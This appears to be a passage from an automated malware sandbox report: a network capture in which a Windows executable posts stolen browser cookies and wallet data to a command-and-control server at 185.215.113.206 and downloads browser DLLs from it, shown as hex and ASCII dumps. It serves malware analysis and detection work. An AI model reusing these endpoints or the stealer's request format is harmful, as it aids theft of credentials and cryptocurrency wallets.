@0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 11, 2024 10:33:04.271280050 CET	112	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49729	185.215.113.206	80	984	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:33:12.053237915 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII Host: 185.215.113.206 Content-Length: 999 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:33:12.053265095 CET	999	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 11, 2024 10:33:13.196187973 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:13.309855938 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="file"------BAKJKFHCAEGDHIDGDHDA--
Nov 11, 2024 10:33:14.006031990 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49747	185.215.113.206	80	984	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:33:19.852647066 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:33:19.852672100 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 11, 2024 10:33:20.993730068 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:21.247797012 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDH Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file"------JKECGDBFCBKFIDHIDHDH--
Nov 11, 2024 10:33:21.948133945 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:23.084328890 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:23.283478022 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 11, 2024 10:33:23.285867929 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 11, 2024 10:33:23.285880089 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 11, 2024 10:33:23.285891056 CET	212	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$
Nov 11, 2024 10:33:23.288230896 CET	1236	IN	Data Raw: 0f b6 c9 c1 e1 18 89 d7 89 54 24 18 0f b6 d2 c1 e2 10 09 ca 0f b6 7c 24 20 c1 e7 08 09 d7 0f b6 4c 24 24 09 f9 0f b6 d3 c1 e2 18 8b 5c 24 08 0f b6 ff c1 e7 10 09 d7 0f b6 5c 24 0c c1 e3 08 09 fb 0f b6 54 24 10 09 da 89 cb 31 c3 25 00 00 00 ff 81 Data Ascii: T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?
Nov 11, 2024 10:33:23.288244963 CET	1236	IN	Data Raw: 03 00 00 00 29 c8 c1 f8 1f 80 7c 33 f4 01 19 db f7 d0 09 c3 21 fb b8 04 00 00 00 29 c8 c1 f8 1f 8b 7d 1c 80 7c 37 f3 01 f7 d0 19 ff 09 c7 21 df 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 Data Ascii: )\|3!)}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1
Nov 11, 2024 10:33:23.288255930 CET	1236	IN	Data Raw: c4 08 c7 47 08 01 00 00 00 57 e8 3a fc 07 00 83 c4 04 eb 09 c7 47 08 01 00 00 00 89 fe 89 f0 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 Data Ascii: GW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjW
Nov 11, 2024 10:33:23.290605068 CET	636	IN	Data Raw: 00 89 c6 8b 45 0c 05 00 ff ff ff 3d 01 ff ff ff 73 20 68 0e e0 ff ff e8 6b f7 07 00 83 c4 04 68 02 01 00 00 56 e8 6f f7 07 00 83 c4 08 e9 cb 00 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb Data Ascii: E=s hkhVohh !Vf.@uVuW)9wSuWT>\>=t%>>f
Nov 11, 2024 10:33:23.290618896 CET	1236	IN	Data Raw: 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 03 32 14 0f 8b 4d e4 88 51 03 83 fe 04 74 74 8b 45 ec 04 05 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 Data Ascii: E}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]SEu0EMME)us) }
Nov 11, 2024 10:33:23.292963982 CET	1236	IN	Data Raw: 66 0f 6f 35 e0 20 08 10 66 0f fe c6 f3 0f 5b c0 66 0f 70 fd f5 66 0f f4 e8 66 0f 70 ed e8 66 0f 70 c0 f5 66 0f f4 c7 66 0f 70 c0 e8 66 0f 62 e8 66 0f eb cd 66 0f 72 f3 17 66 0f fe de f3 0f 5b c3 66 0f 70 dc f5 66 0f f4 e0 66 0f 70 e4 e8 66 0f 70 Data Ascii: fo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU9UEuUM}]?uu]}9u}UM}]Et5UM9M]
Nov 11, 2024 10:33:24.265729904 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:24.465517044 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 11, 2024 10:33:24.952131033 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:25.151036024 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 11, 2024 10:33:25.373567104 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:25.577016115 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 11, 2024 10:33:26.048058033 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:26.247541904 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 11, 2024 10:33:26.453588009 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:26.652880907 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 11, 2024 10:33:27.990000963 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:33:28.690833092 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:28.828985929 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"wallets------JDHCBAEHJJJKKFIDGHJE--
